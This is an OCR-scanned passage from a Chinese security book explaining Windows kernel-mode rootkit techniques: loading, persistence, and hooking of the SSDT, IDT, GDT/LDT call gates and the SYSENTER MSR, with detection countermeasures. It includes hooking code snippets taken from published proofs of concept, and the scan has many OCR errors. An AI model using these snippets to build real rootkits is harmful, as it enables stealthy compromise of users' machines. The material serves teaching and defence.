我 们 已 经 足够 详细 地 介绍 了 x86 指 令 集 、Windows 体 系 结构 和 驱动 程序 框架 ， 现 在 我 们 来 对 付 手 上 的 实际 问题 : 内 核 模式 
Rootkit。 在 本 节 中 ， 我 们 将 讨论 Rootkit 用 于 侵入 和 破坏 Windows 内 核 的 著名 技术 。 昌 然 一 些 技 术 包含 了 不 胜 枚 举 的 组 合 ( 例 
MF) ， 但 是 大 部 分 流行 的 技术 可 以 归纳 为 几 种 标准 的 技巧 。 


4.4.1 ”内核 模式 Rootkit 简 介 


内 核 模式 Rootkit 就 是 运行 于 操作 系统 实现 的 CPU 的 最 高 特权 级 别 (也 就 是 Ring0) 的 恶意 二 进 制 代 码 。 正 如 用 户 模式 中 的 
Rootkit 必 须 有 可 执行 的 二 进 制 代 码 ， 内 核 模式 中 的 Rootkit 也 必须 有 二 进 制 程序 。 这 可 以 是 可 装 入 的 内 核 模块 (DLL) 或 者 设备 


驱动 程序 (sys) 的 形式 ， 可 以 直接 由 装 入 程序 装 入 或 者 由 操作 系统 以 某 种 方式 调用 (例如 ， 可 以 注册 为 处 理 一 个 中 断 或 者 插入 
文件 系统 的 一 个 驱动 程序 链 ) 。 一 旦 驱动 程序 装 入 ，Rootkit 处 于 内 核 空间 ， 可 以 开始 更 改 操作 系统 功能 以 稳固 地 存在 于 系统 
上 。 


大 部 分 内 核 模式 Rootkit 都 具有 使 其 难以 捕 皖 和 删除 的 某 些 特 性 。 这 包括 : 


. 隐 英 性 ”因为 获得 内 核 模 式 访 问 权 可 能 很 困难 ， 作 者 一 般 对 于 隐身 都 有 足够 的 认识 。 而 且 ， 因 为 许多 防 病毒 软件 、 主 机 入 
侵 检 测 (HIDS) 、 主 机 入 侵 防 御 系 统 (HIPS) 以 及 防火 墙 产 品 都 严密 地 监控 内 核 模式 ，Rootkit 必 须 小 心 ， 以 避免 触发 警报 或 者 


留 下 明显 的 痕迹 。 


. 持续 性 ”编写 Rootkit 的 综合 目标 之 一 是 获得 在 系统 上 的 持续 存在 。 否 则 ， 没 有 必要 经 历 艰 苦 的 内 核 驱动 程序 编写 过 程 。 因 
此 ， 内 核 模式 Rootkit 一 般 经 过 精心 地 思考 并 且 包 含 一 些 特性 或 者 特性 组 合 ， 通 过 使 用 多 种 技术 复制 其 立足 点 ， 确 保 Rootkit 能 够 在 
重启 甚至 被 发 现 和 清除 之 后 存活 下 来 。 


: 严重 性 ”内核 模 式 Rootkit 使 用 高 级 技术 在 操作 系统 级 别 破坏 用 户 计算 机 的 完整 性 。 这 不 仅 对 系统 稳定 性 不 利 〈 用 户 可 能 经 


历 频 繁 的 崩溃 或 者 性 能 影响 ) ， 而 且 删 除 感染 及 将 系统 恢复 为 正常 操作 也 非常 困难 。 


4.4.2 ”内 核 模 式 Rootkit 所 面 对 的 挑战 


Rootkit 作 者 面 对 一 些 和 合法 的 内 核 驱动 程序 开发 人 员 相 同 的 软件 开发 问题 : 
.内核 模式 本 质 上 没有 错误 处 理 系 统 ; 逻辑 错误 将 造成 蓝屏 并 使 系统 衣 渍 。 


* 因为 内 核 驱 动 程序 更 接近 于 硬件 ， 内 核 模 式 中 的 操作 更 容易 引起 移植 性 问题 ， 例 如 ， 操 作 系 统 版 本 /构建 、 底 层 硬件 和 体 
系 结构 (PAE， 非 PAE，x64 等 ) 。 


- 其 他 驱动 程序 争 用 相同 资源 可 能 导致 系统 不 稳定 。 





.内核 空间 不 可 预测 和 多 变 的 特性 ， 以 及 多 样 性 要 求 广泛 的 测试 。 

除了 合法 的 开发 问题 ，Rootkit 作 者 必须 在 装 入 驱动 程序 和 保持 隐藏 上 具有 创造 力 ， 本 质 上 : 

:他们 必须 找到 一 个 装 入 的 方式 ; 

“他们 必须 找到 一 个 执行 的 方式 ; 

:他们 必须 按照 保持 隐藏 和 确保 持续 性 的 方式 进行 。 

这 些 挑战 在 用 户 空间 中 不 存在 ， 因 为 整个 操作 系统 是 围绕 持续 的 用 户 模式 以 及 避免 其 骨 溃 来 构建 的 。 
装 入 

我 们 已 经 阐述 了 驱动 程序 由 MO 管理 器 装 入 后 ， 如 何 侵害 内 核 模 式 的 驱动 程序 体系 结构 ， 但 是 首先 是 驱动 程序 如 何 进入 内 
核 ” 这 个 问题 有 很 多 有 趣 的 答案 ， 也 充满 了 各 种 各 样 的 可 能 | 


Rootkit 不 是 从 内 核 启动 的 ， 必 须 有 一 个 用 户 模式 二 进 制程 序 或 者 恶意 软件 的 一 部 分 来 初始 化 装 入 进程 。 这 个 程序 通常 称 
为 装 入 程序 (loader) 。 装 入 程序 有 多 个 选项 ， 这 取决 于 其 启动 的 位 置 (在 磁盘 上 或 者 直接 注入 到 内 存 ) 以 及 当前 使 用 的 账户 的 
权限 ， 可 以 选择 合法 地 装 入 、 通 过 选择 一 个 或 者 多 个 未 写 入 文档 的 API 函 数 ， 或 者 通过 一 个 利用 程序 装 入 。 


因为 驱动 程序 是 操作 系统 关键 的 合法 部 件 ， 所 以 操作 系统 自然 允许 驱动 程序 装 入 。 这 个 装 入 过 程 由 服务 控制 管理 器 
(Service Control Manager, SCM) 或 者 services.exe ( 子 进程 名 为 svchost.exe) 处 理 。 一 般 ， 表 现 良好 的 程序 将 使 用 
Win32API 联 络 SCM 以 装 入 驱动 程序 。 但 是 ， 以 这 种 方式 装 入 驱动 程序 仅 能 由 具有 管理 员 权限 的 用 户 进行 ， 而 Rootkit 在 装 入 期 
间 不 总 是 具备 奢侈 的 管理 员 权限 。 当 然 使 用 直接 内 核对 象 操纵 (Direct Kernel Object Manipulation, DKOM) 以 及 其 他 著名 
的 技术 ， 用 户 模式 恶意 软件 能 够 为 其 进程 提升 所 需 的 权限 并 且 获 得 管理 员 权 限 。 


这 样 装 入 一 个 驱动 程序 也 会 创建 一 个 注册 表 项 目 ， 还 会 留 下 痕迹 。 这 就 是 Rootkit 一 般 在 装 入 之 后 会 开始 掩盖 其 踪迹 的 原 
因 。 


20 世 纪 90 年 代 未 Greg Hoglund 编 写 的 Migbot Rootkit 使 用 了 一 种 方法 ， 涉 及 一 个 由 NTDLL.DLL 输 出 的 未 写 入 文档 的 
Windows API 函 数 ZwSetSystemlnformation () 。 这 个 函数 允许 使 用 任意 的 模块 名 将 二 进 制 代 码 装 入 内 存 。 一 旦 模块 装 入 ， 
就 无 法 在 不 重启 系统 的 情况 下 印 载 。 这 种 方法 不 可 靠 ， 而 且 可 能 导致 系统 崩溃 ， 因 为 驱动 程序 被 装 入 到 可 分 页 的 内 核 内 存 (也 就 
是 ， 可 以 被 写 到 磁盘 并 从 内 存 删 除 的 内 核 内 存 ) 。 当 驱动 程序 的 代码 或 者 数据 处 于 交换 出 内 存 的 状态 ， 有 些 条 件 下 代码 或 者 数据 
就 无 法 访问 。 如 果 企 图 引用 这 些 内 存 ， 系 统 将 会 崩溃 。 


这 种 表现 是 操作 系统 设计 的 可 中 断 性 (interruptibility) 原则 的 结果 。 为 了 使 系统 可 中 断 ， 它 必须 推迟 当前 执行 的 进程 ， 让 
位 给 请 求 CPU 时 间 的 更 高 优先 级 的 线程 。 在 Windows 中 ， 这 个 概念 以 中 断 请 求 级 别 (interrupt request level, IRQL) 的 方式 
实现 。 系 统 可 以 在 任何 给 定 的 时 间 点 运行 于 各 种 IRQL， 在 较 高 的 IRQL 下 ， 大 部 分 系统 服务 不 被 执行 。 内 存 管理 器 的 页 面 错误 处 
理 程序 就 是 这 样 一 个 服务 。 因 此 ， 如 果 驱 动 程序 运行 于 过 高 的 IRQL 并 且 导 致 一 个 页 面 错误 (请 求 之 前 已 被 交换 出 内 存 的 数据 或 
者 代码 ) ， 内 存 管理 器 将 不 运行 并 且 将 不 会 捕捉 这 个 问题 。 结 果 是 系统 缺陷 检查 (蓝屏 ) 。 


值得 一 提 的 是 ， 这 只 是 内 核 驱动 程序 开发 中 使 人 感到 极其 乏味 和 危险 的 许多 微妙 之 处 中 的 一 个 。 大 部 分 应 用 程序 开发 人 员 都 
习惯 于 编写 有 缺陷 的 代码 ， 因 为 操作 系统 在 运行 时 会 捕捉 他 们 的 错误 。 在 开发 内 核 驱动 程序 时 ， 开 发 人 员 必须 记 住 ， 可 能 没有 什 
么 能 够 使 系统 避免 崩 演 。 


得 以 执行 


作为 内 核 驱动 程序 装 入 之 后 ，Rootkit 在 Windows 驱 动 程序 体系 结构 的 规则 下 操作 。 它 在 执行 之 前 必须 等 待 MO 操 作 发 生 。 
这 与 用 户 模式 进程 相反 ， 用 户 模式 进程 在 工作 完成 并 且 自 行 终 止 之 前 一 直 运 行 着 。 内 核 驱动 程序 在 需要 时 执行 并 且 在 初始 化 MO 
的 调用 进程 的 上 下 文 下 运行 ， 如 果 驱 动 程序 是 由 于 中 断 请 求 而 被 调用 ， 则 运行 在 任意 的 上 下 文中 。 


这 意味 着 Rootkit 作 者 必须 围绕 内 核 模式 规则 理解 这 些 执行 参数 并 构造 Rootkit。 


与 用 户 模式 通信 


通常 ，Rootkit 有 一 个 作为 指挥 控制 代理 的 用 户 模式 组 件 (有 时 候 被 称 作 控制 器 ) 。 这 是 因为 在 前 面 内 容 中 提 到 的 ， 必 须 有 
些 别 的 程序 来 执行 驱动 程序 代码 。 如 果 Rootkit 是 独立 的 ， 那 么 本 质 上 是 操作 系统 在 驱动 Rootkit。 用 户 模式 的 控制 器 发 送 命令 给 
Rootkit 并 且 分 析 传 回 的 信息 。 对 于 隐身 的 Rootkit， 控 制 器 一 般 在 另 一 台 机 器 上 ， 并 且 不 经 常 通信 以 免 引起 怀疑 。 控 制 器 也 可 以 
是 用 户 模式 中 的 一 个 单独 的 睡眠 线程 ， 获 得 在 一 个 应 用 程序 (例如 Internet Explorer) 中 的 持续 存在 。 这 个 线程 可 以 在 几 种 任务 
中 循环 ， 例 如 ， 轮 询 远 程 站 点 获取 新 命令 ， 读 取 和 发 出 这 些 命令 给 Rootkit 驱 动 程序 ， 然 后 下 休眠 一 段 预 先 设置 的 时 间 |。 


保持 隐蔽 性 和 持续 性 


Rootkit 一 旦 被 装 入 ， 它 就 会 通过 隐藏 注册 表 键 值 、 进 程 和 文件 来 掩盖 踪迹 。 但 是 ， 隐 藏 正在 变 得 没有 必要 ， 因 为 Rootkit 和 
防 Rootkit 技 术 同 样 在 不 断 进步 。 恶 意 代 码 可 以 直接 注入 到 内 存 中 ， 你 没有 必要 使 用 注册 表 或 者 磁盘 。 


Rootkit 能 够 采取 许多 措施 来 获得 在 系统 上 的 持续 存在 。 这 一 般 包 括 在 多 个 系统 函数 及 /或 服务 上 安装 多 个 钩子 ， 以 及 修改 注 
册 表 在 启动 时 重新 装 入 Rootkit。 更 高 级 的 Rootkit 甚 至 可 以 隐藏 在 更 高 的 内 存 区 域 (也 就 是 内 核 存 储 ) ， 使 防 病毒 软件 无 法 查 
看 ， 或 者 隐藏 在 磁盘 未 分 区 的 空间 。 一 些 Rootkit 会 感染 启动 扇 区 ， 这 样 可 以 在 下 次 系统 启动 时 先 于 操作 系统 执行 。 


4.4.3 方法 和 技术 


在 过 去 的 10 年 中 ，Rootkit 社 区 已 经 记录 了 许多 技术 。 这 些 技术 有 的 已 经 有 了 几 十 个 变种 ， 所 以 我 们 将 介绍 其 中 使 用 最 广泛 
的 技术 。 在 这 些 技术 的 讨论 之 后 ， 我 们 将 纵览 使 用 这 些 技术 的 常见 Rootkit 实 例 。 


二 





为 了 进行 常规 的 工作 ， 操 作 系统 必须 跟踪 几 王 个 对 象 、 句 柄 、 指 针 和 其 他 数据 结构 。Windows 中 常用 的 数据 结构 之 一 是 类 
似 于 具有 行 和 列 的 查找 表格 。Windows 是 一 个 任务 驱动 、 对 称 多 进程 的 操作 系统 ， 许 多 数据 结构 和 表格 都 是 用 户 模式 的 应 用 程 
序 的 一 部 分 。 几 乎 所 有 关键 表格 都 存在 于 内 核 模式 中 ， 所 以 对 于 要 修改 这 些 表格 和 数据 结构 的 攻击 者 来 说 ， 内 核 驱 动 程序 通常 是 
最 佳 的 途径 。 我 们 将 关注 已 经 成 为 内 核 模 式 Rootkit 常 用 目标 的 主要 表格 。 


在 所 有 表格 钩子 技术 中 ， 如 果 Rootkit 希 望 获得 隐蔽 性 ， 就 必须 实施 其 他 隐藏 其 存在 的 高 级 技术 。 因 为 简单 地 读 取 受 影响 的 
表格 (SSDT、GDT 和 IDT) 对 于 检测 工具 是 没有 价值 的 ， 修 改 表格 而 没有 掩盖 其 踪迹 的 Rootkit 可 能 被 轻易 地 发 现 。 因 此 ， 隐 身 
的 Rootkit 必 须 竟 尽 全 力 地 隐藏 修改 ， 例 如 ， 建 立 影子 表格 (保留 原始 表格 的 一 个 元 余 副 本 ) 。 通 过 监控 准备 读 取 修 改 后 表格 的 
应 用 程序 /驱动 程序 ，Rootkit 能 够 很 快 地 将 原始 表格 换 回 到 内 存 中 以 愚弄 应 用 程序 。 这 种 影子 可 以 使 用 TLB 同 步 攻击 来 实现 ， 这 
种 方法 在 4.5 节 中 描述 的 Shadow Walker Rootkit 中 得 到 应 用 。 


注意 : Rootkit 需 要 原始 数据 或 者 代码 ， 以 便 在 Rootkit 执 行 其 指令 之 后 恢复 原始 任务 。 如 果 Rootkit 做 不 到 这 一 点 ， 原 始 任务 就 
不 能 完成 ; 这 样 ， 它 就 有 可 能 被 发 现 ， 从 而 导致 隐身 机 制 失败 。 


系统 服务 调度 表 (SSDT) 


谈 到 与 编写 和 检测 Rootkit 相 关 的 技术 ，SSDT 可 能 是 Windows 操 作 系 统 中 最 广泛 地 被 侵入 的 数据 结构 。SSDT 是 在 请 求 系统 
服务 时 引导 程序 执行 流向 的 机 制 。 系 统 服务 是 操作 系统 提供 的 功能 ， 在 Executive 中 实现 ， 这 在 前 面 已 经 讨论 过 。 系 统 服务 的 例 
子 包括 文件 操作 和 其 他 MO、 内 存 管理 请 求 以 及 配置 管理 操作 。 简 而 言 之 ， 用 户 模 式 程 序 必须 执行 内 核 函 数 ， 为 此 ， 它 们 必须 有 
一 个 迁移 到 内 核 模式 的 方式 。SSDT 是 操作 系统 用 于 用 户 模式 请 求 与 系统 服务 对 应 天 系 的 查找 表格 。 这 整个 过 程 被 称 作 系统 服务 


系统 服务 请 求 的 调度 方式 取决 于 系统 处 理 器 的 体系 结构 。 在 Pentium 1 和 更 早 的 x86 处 理 器 上 ，Windows 设 置 系统 服务 请 求 
陷阱 ， 这 由 应 用 程序 调用 一 个 Win32API 函 数 开始 。 这 个 API 函 数 接着 使 用 x86 汇 编 指 令 INT 向 处 理 器 发 出 中 断 指令 并 传递 什 
0x2e。 当 用 户 模式 中 的 请 求 应 用 程序 发 出 INTOx2E 时 ， 操 作 系 统 查询 中 断 调度 表 (IDT) 来 确定 传递 0x2E 时 应 该 采取 什么 措施 。 
这 个 动作 由 操作 系统 在 启动 时 进行 。 当 系统 在 IDT 中 查找 0x2E 时 ， 它 找到 了 系统 服务 调度 程序 的 地 址 ， 这 个 内 核 模式 程序 负责 将 
工作 传递 给 相应 的 Executive 服 务 。 然 后 发 生 上 下 文 切换 ， 将 请 求 应 用 程序 的 执行 线程 转 入 内 核 模式 ， 工 作 得 以 进行 。 


这 个 过 程 需 要 许多 内 核 开 销 。 所 以 在 后 来 的 处 理 器 中 ，Windows 利 用 更 快 的 SYSENTER 指 令 及 相关 的 寄存 器 。 在 启动 
时 ，Windows 用 系统 服务 调度 程序 的 地 址 填充 SYSENTER 寄 存 器 ， 这 样 当 调度 请 求 发 生 时 (程序 发 出 SYSENTER 指 令 来 代替 
INTOx2E) ，CPU 立 即 找到 调度 程序 地 址 ， 并 进行 上 下 文 切换 。Windows 在 x64 系 统 上 使 用 相似 的 指令 SYSCALL。 


系统 服务 调度 程序 实际 引用 的 查找 表格 称 为 KeSserviceDescriptorTable， 包 含 了 NTOSKRNL.EXE 输 出 的 核心 Executive 功 
能 。 实 际 上 有 四 个 服务 表 ， 这 里 我 们 不 做 介绍 。 


现在 我 们 来 谈 谈 内 核 模式 Rootkit 如 何 利 用 和 侵害 这 个 结构 。 挂 钩 这 个 表格 的 目标 是 重 定向 程序 执行 流向 ， 这 样 ， 当 用 户 应 
用 程序 (甚至 用 户 模 式 的 系统 服务 ) 请 求 系统 调用 时 ， 就 被 重 定向 到 Rootkit 驱 动 程序 代码 。 为 了 达到 这 个 目的 ，Rootkit 必 须 挂 
钩 或 者 重 定向 需要 被 挂钩 的 API 函 数 在 SSDT 中 的 对 应 项 。 


为 了 挂钩 SSDT 中 的 单独 项 目 ，Rootkit 作 者 必须 首先 在 运行 时 定位 结构 ， 这 可 以 多 种 方式 完成 : 
通过 引用 NTOSKRNL.EXE 的 输出 动态 地 在 Rootkit 源 代码 中 输入 KeService-Desc-r-i-p-torTable 标 志 。 


- 使 用 ETHREAD 结 构 。 每 个 执行 中 的 线程 都 有 一 个 指向 SSDT 的 内 部 指针 ， 这 由 OS 在 运行 时 自动 填写 。 该 指针 存在 于 线程 
的 数据 结构 ETHRAD 中 一 个 可 预测 的 偏 移 量 中 。 这 个 结构 可 以 由 线程 调用 Win32API 函 数 PsGetCuttentThread () 来 获得 。 


. 查找 与 OS 相关 的 偏 移 量 来 使 用 内 核 的 进程 控制 块 (kernel”s Processor Control Block, KPCB) 。 


下 一 步 是 将 这 个 偏 移 量 放 入 Rootkit 作 者 希望 挂钩 的 浮 数 的 SSDT 中 。 这 可 以 使 用 公开 的 源 代码 ， 或 者 反 汇编 该 函数 并 且 寻 找 
第 一 条 MOV EAX，[index] 指 令 手工 查找 该 位 置 。[index] 值 引用 函数 在 表格 中 的 索引 。 注 意 ， 这 仅 对 Nt* 和 Zw*Win32API 浮 数 
有 效 ， 这 两 类 函数 都 是 调用 系统 服务 调度 程序 的 系统 存根 程序 。 下 面 是 一 个 例子 。 注 意 十 六 进 制 数 124 (服务 表 中 的 索引 ) 被 移 
入 EAX 寄存 器 中 ， 在 这 个 存根 调用 实际 函数 时 还 会 验证 几 个 参数 。 


kd> u 805C03AC 
nt !NtQueryPortInformationProcess: 


805c03ac 64a124010000 mov eax,dword ptr fs: [00000124h] 

805c03b2 8b4844 mov ecx,dword ptr [eax+44h] 

805c03b5 83b9bc00000000 cmp dword ptr [ecx+0BCh] ,0 

805c03be 740d je nt !NtQueryPortInformationProcess+0xlf (805c03cb) 
805c03be £6804802000004 test byte ptr [eax+248h] ,4 

805c03c5 7504 jne nt !NtQueryPortInformationProcess+0x1f (805c03cb) 
805c03c7 33c0 xor eax, eax 

805c03c9 40 inc eax 


现在 我 们 已 经 掌握 了 SSDT 位 置 和 Rootkit 作 者 希望 挂钩 的 函数 的 索引 ， 将 索引 赋值 为 Rootkit 的 重 定向 函数 是 很 简单 的 事 
情 ， 也 就 是 ， 


//SSDT hooking pseudocode 
KeServiceDescriptorTable [function_offset] =AddrOfRootkitHookingFunction; 


然后 ， 在 Rootkit 驱 动 程序 中 ， 将 过 滤 “真正 ”的 API 调 用 所 获得 的 信息 : 


//Pseudocode for hooking function 

ReturnValue RootkitHookingFunction (parameters) 
ReturnData=ZwHookedFunction (parameters) 
FilterInformation(ReturnData) ; 

Return ReturnData; 


Rootkit 以 这 种 方式 挂钩 的 常见 函数 包括 NtQuerySystemlnformation () 和 NtCreateFile () ， 用 来 隐藏 进程 和 文件 。 


许多 Rootkit 使 用 这 种 技术 ， 比 如 He4hook Rootkit.。 


© sorsra 


Rootkit 在 实现 SSDT 钩 子 时 面 对 一 些 挑战 。 随 着 OS 的 修补 ，Windows 经 常 增加 、 删 除 和 修改 SSDT 项 目 ， 所 以 Rootkit 作 者 
在 试图 查找 数据 结构 的 设 定 偏 移 量 时 ， 必 须 考虑 这 些 变数 。 在 x64 系 统 上 ，Windows 使 用 Patchguard 来 实现 更 聪明 的 避免 SSDT 
钩子 的 方法 ， 在 NTOSKRNL.EXE 内 部 的 表格 在 系统 启动 和 运行 时 都 进行 检查 。 而 且 ， 大 部 分 防 病毒 软件 、 个 人 防火 墙 和 HIPs 解 
决 方案 也 保护 SSDT， 一 般 采 用 持续 监控 数据 结构 修改 或 者 完全 限制 访问 该 结构 的 方式 。Kaspersky Anti-Virus 实 际 上 是 动态 地 
迁移 SSDT! 


中 断 调 度 表 (IDT) 


中 断 是 操作 系统 中 I/O 事 务 的 基本 概念 。 大 部 分 硬件 是 中 断 驱 动 的 ， 也 就 是 在 需要 服务 时 发 送 一 个 信号 给 被 称 为 中 断 请 求 
(IRQ) 的 处 理 器 。 处 理 器 接着 查询 中 断 调度 表 (IDT) 查找 注册 为 处 理 特 定 IRQ 的 函数 和 驱动 程序 (或 者 中 断 服务 例 程 
(ISR, Interrupt Service Routine) ) 。 这 个 过 程 与 “系统 服务 调度 表 ” 人 小 节 中 所 讨论 的 系统 服务 调度 非常 相似 。 一 个 小 的 差 


别 是 系统 上 每 个 处 理 器 都 有 一 个 IDT。 中 断 也 可 以 从 软件 发 出 ， 这 在 前 面 讨论 INT 指 令 时 提 到 过 。 例 如 ，1INTOx2E 通 知 处 理 器 进 
入 内 核 模式 。 


1DT 钧 子 的 目标 是 挂钩 已 经 注册 到 给 定 中 断 的 任意 函数 。 低 级 击 键 记 录 程 序 就 是 一 个 例子 ， 通 过 替换 存储 在 IDT 中 用 于 键盘 
的 服务 例 程 ，Rootkit 可 以 嗅 探 和 记录 击 键 。 


和 SSDT 钩 子 技术 一 样 ， 必 须 找到 IDT 以 便 挂钩 ， 这 不 难 做 到 。x86 指 令 SIDT 在 CPU 寄存 器 中 存储 1DT 地 址 用 于 读 取 。 在 蔡 换 
所 希望 的 中 断 的 1SR 之 后 ， 整 个 表格 可 以 使 用 x86 指 令 LIDT 复 制 回 原来 的 位 置 。 下 面 的 代码 来 自 Skape，9Skape 是 一 个 本 地 的 
Windows 内 核 模 式 后 门 技术 的 目录 (http://www.hick.org/~mmiller/) ， 它 演示 了 这 种 操作 : 

static NTSTATUS HookIdtEntry ( 


IN UCHAR DescriptorIndex, 
IN ULONG_PTR NewHandler,OUT PULONG PTR OriginalHandler OPTIONAL) 


{ 
PIDT DESCRIPTOR Descriptor = NULL; 
IDT Idt; 
_ asm sidt [Idt] 
Descriptor = &Idt.Descriptors [DescriptorIndex] ; 
*OriginalHandler = (ULONG PTR) (Descriptor->0ffsetLow+ 

(Descriptor->OffsetHigh << 16)); 

Descriptor->OffsetLow = (USHORT) (NewHandler & Oxffff); 
Descriptor->OffsetHigh = (USHORT) ((NewHandler >\> 16) & Oxffff) ; 
_ asm lidt [Idt] 
return STATUS SUCCESS; 

} 


1DT 结 构 是 表现 x861DT 的 字段 的 自 定 义 结构 。 在 第 8 行 中 ， 我 们 使 用 x86 指 令 SIDT 将 当前 IDT 复 制 到 局 部 结构 ， 然 后 存储 我 们 
希望 挂钩 的 描述 符 项 目 (变量 “Descriptor”) 。 在 第 10 行 中 ， 我 们 合并 低 16 位 和 高 16 位 得 到 一 个 32 位 的 原始 ISR 地 址 。 接 着 我 
们 用 自己 的 钩子 函数 (NewHandler) 地 址 的 低 16 位 和 高 16 位 设置 相应 的 值 。 最 后 ， 使 用 x86 指 令 LIDT 更 新 IDT。 


一 IDT 对 策 


Microsoft 的 Patchguard 在 64 位 系统 上 阻止 对 这 个 表格 的 任何 访问 ， 许 多 开源 Rootkit 工 具 (例如 ，GMER、 
RootkitRevealer 和 lce Sword) 都 可 以 发 现 这 些 类 型 的 钩子 。 


全 局 描述 符 表 (GDT) 和 局 部 描述 符 表 (LDT) 


全 局 描述 符 表 (Global Descriptor Table) 是 按 处 理 器 划分 的 结构 ， 用 于 保存 描述 内 存 区 域 的 地 址 和 访问 特权 的 段 描述 
符 。 这 张 表 格 在 每 次 访问 内 存 时 由 CPU 使 用 ， 用 于 确保 执行 代码 有 权 访 问 在 段 寄 存 器 中 指出 的 内 存 段 。LDT 本 质 上 也 一 样 ， 但 是 
它 是 按照 进程 而 不 是 按照 处 理 器 划分 的 。 它 被 单独 的 进程 用 于 定义 进程 内 部 受 保护 的 内 存 区 域 。 


Rootkit 只 能 使 用 少数 有 良好 文档 的 方法 来 侵害 这 些 表格 ， 但 是 影响 很 明显 : 如 果 一 个 Rootkit 能 够 修改 GDT， 它 将 全 面 改变 
系统 上 的 内 存 段 的 执行 特权 。 对 LDT 的 修改 仪 影响 特定 的 进程 。 修 改 这 两 个 表格 都 使 用 户 模 式 代码 能 够 装 入 和 执行 任何 内 核 模 式 
代码 。 


与 这 些 表格 有 关 的 一 种 特别 著名 的 技术 是 安装 定制 的 调用 门 。 调 用 门 本质 上 是 从 用 户 模式 代码 进入 内 核 模式 代码 的 屏障 。 在 
汇编 语言 级 别 ， 如 果 你 发 出 一 个 远程 JMP 或 者 CALL 命 令 (与 局 部 CALL 或 者 JMP 相 反 ， 局 部 调用 或 者 跳 转 在 相同 的 代码 段 内 ， 不 


需要 验证 ) ， 你 必须 引用 GDT 或 者 LDT 中 已 经 安装 的 一 个 调用 门 (但 是 SYSENTER 调 用 支持 是 处 理 器 固有 的 ， 所 以 不 需要 调用 门 
或 者 中 断 门 ) 。 调 用 门 是 GDT 中 的 一 类 描述 符 ， 具 有 4 个 字段 ， 其 中 一 个 是 描述 符 特权 级 (Descriptor Privilege 

Level, DPL) 。 这 个 字段 定义 使 用 调用 门 所 需要 的 请 求 代码 特权 级 (也 就 是 RiNg0，Ring1，Ring2 或 Ring3) 。 每 当 执行 代码 试 
图 使 用 一 个 调用 门 时 ， 处 理 器 都 检查 DPL。 但 是 ， 如 果 打算 安装 自己 的 调用 门 ， 就 可 以 将 DPL 设 置 为 任何 值 。 


从 内 核 模式 可 以 使 用 以 下 3 个 API 调 用 中 的 任何 一 个 ,轻松 地 在 GDT 或 者 LDT 中 安装 一 个 调用 门 : 


NTSTATUS KeI386AllocateGdtSelectors (USHORT *SelectorArray, USHORT nSelectors) ; 
NTSTATUS KelI386ReleaseGdtSelectors (USHORT *SelectorArray, USHORT nSelectors) ; 
NTSTATUS KelI386SetGdtSelector (USHORT Selector, PVOID Descriptor); 


头 两 个 API 函 数 分 别 分 配 和 释放 GDT 中 打开 的 槽 (slot) ， 可 以 把 这 看 作 在 一 个 数组 结构 (因为 数组 就 是 一 个 表格 ) 中 分 配 
一 个 新 的 索引 。 一 旦 分 配 了 槽 ，Kel386SsetGdtselector () 使 用 提供 的 描述 符 填充 在 指定 索引 (selector) 处 的 新 模 。 为 了 从 内 
核 模 式 安装 一 个 调用 门 ，Rootkit 将 首先 分 配 一 个 新 模 ， 然 后 用 引用 一 个 内 存 段 的 16 位 选择 符 填 充 该 槽 。 这 个 内 存 段 将 指向 
Rootkit 本 身 的 代码 或 者 其 他 Rootkit 希 望 让 用 户 模式 应 用 程序 访问 的 其 他 例 程 。 完 成 这 项 工作 之 后 ， 将 允许 这 个 内 存 段 (这 是 内 
核 模式 的 内 存 段 ) 的 任何 用 户 模式 读 或 者 写 请 求 。 


你 也 可 以 从 用 户 模式 安装 调用 门 ， 方 法 之 一 在 《Phrack》 和 杂志 的 第 11 卷 问题 
59 (http://www. fsl.cs.sunysb.edu/~ dquigley/files/vista_security/p59-0x10 Playing with Windows dev (k) mem.txt) 
中 首先 提出 。 这 种 方法 使 用 直接 内 核对 象 操纵 (Direct Kernel Object Manipulation, DKOM) ， 在 Windows XP Service 
Pack2 之 后 已 经 不 再 使 用 。 


© GDT 和 LDT 对 策 


Microsoft 的 Patchguard 被 配置 为 在 64 位 系统 上 监控 GDT 数 据 结 构 ， 许 多 开源 Rootkit 工 具 ， 例 如 ，GMER、 
RootkitRevealer 和 lce Sword 都 可 以 检测 GDT 的 变化 ， 例 如 安装 调用 门 。Windows XP Service Pack2 和 Windows 
Server2003Service Pack1 之 后 实施 的 操作 系统 修改 可 阻止 DKOM。 


NZ 
@” 


特别 模块 寄存 器 (Model-Specific Registers, MSR) 钩子 





MSR 是 20 世 纪 90 年 代 末 在 Pentium 1 之 后 引入 的 特殊 CPU 寄存 器 ， 用 于 为 操作 系统 和 用 户 程序 提供 高 级 特性 。 这 些 特 性 包 
括 性 能 的 改进 ， 最 明显 的 是 我 们 在 本 章 中 已 经 多 次 提 到 的 SYSENTER/SYSEXIT 指 令 。 因 为 这 些 指令 用 作 调 用 门 和 其 他 将 代码 执 
行 从 用 户 模式 转移 到 内 核 模式 方法 的 快速 替代 方案 ， 它 们 不 需要 任何 参数 。 为 此 ， 操 作 系 统 在 启动 期 间 填 写 3 个 特殊 的 MSR， 在 
每 次 发 出 SYSENTER 指 令 时 使 用 。 其 中 一 个 寄存 器 IA32_ SYSENTER IP 包含 了 调用 SYSENTER 指 令 之 后 将 会 得 以 执行 的 内 核 模块 
的 地 址 。 通 过 使 用 Rootkit 函 数 覆盖 这 个 寄存 器 ， 内 核 模式 Rootkit 可 以 有 效 地 改变 每 个 系统 服务 调用 的 执行 流 ， 根 据 需要 拦截 和 
修改 信息 。 这 种 技术 有 时 被 称 为 SYSENTER 钩 子 ，2005 年 在 jamie Butler 开 发 的 Rootkit 中 首次 出 现 。 


因为 内 核 模式 代码 可 以 使 用 x86 指 令 RDMSR 和 WRMSR 读 写 MSR，Rootkit 可 以 在 驱动 程序 源 代 码 中 使 用 嵌入 汇编 简单 地 挂 
钩 SYSENTER: 


asm 
= { 
mov ecx, 0x176 //176 is the index into the MSR table for IA32_SYSENTER_EIP 
rdmsr // read the value of the IA32_SYSENTER_EIP register 
mov d_origKiFastCallEntry, eax 
mov eax, MyKiFastCallEntry // Hook function address 
wrmsr // Write to the IA32 SYSENTER EIP register 


} 


以 上 代码 来 自 Butler 发 布 的 SysEnterHook 概 念 验证 性 Rootkit。 


© MSR 对 策 


MSR 恰 如 其 名 : 特别 模块 。 这 意味 着 在 未 来 它们 可 能 不 被 支持 ，Rootkit 有 很 大 的 可 能 装 入 不 实现 这 些 寄 存 器 的 系统 上 。 发 


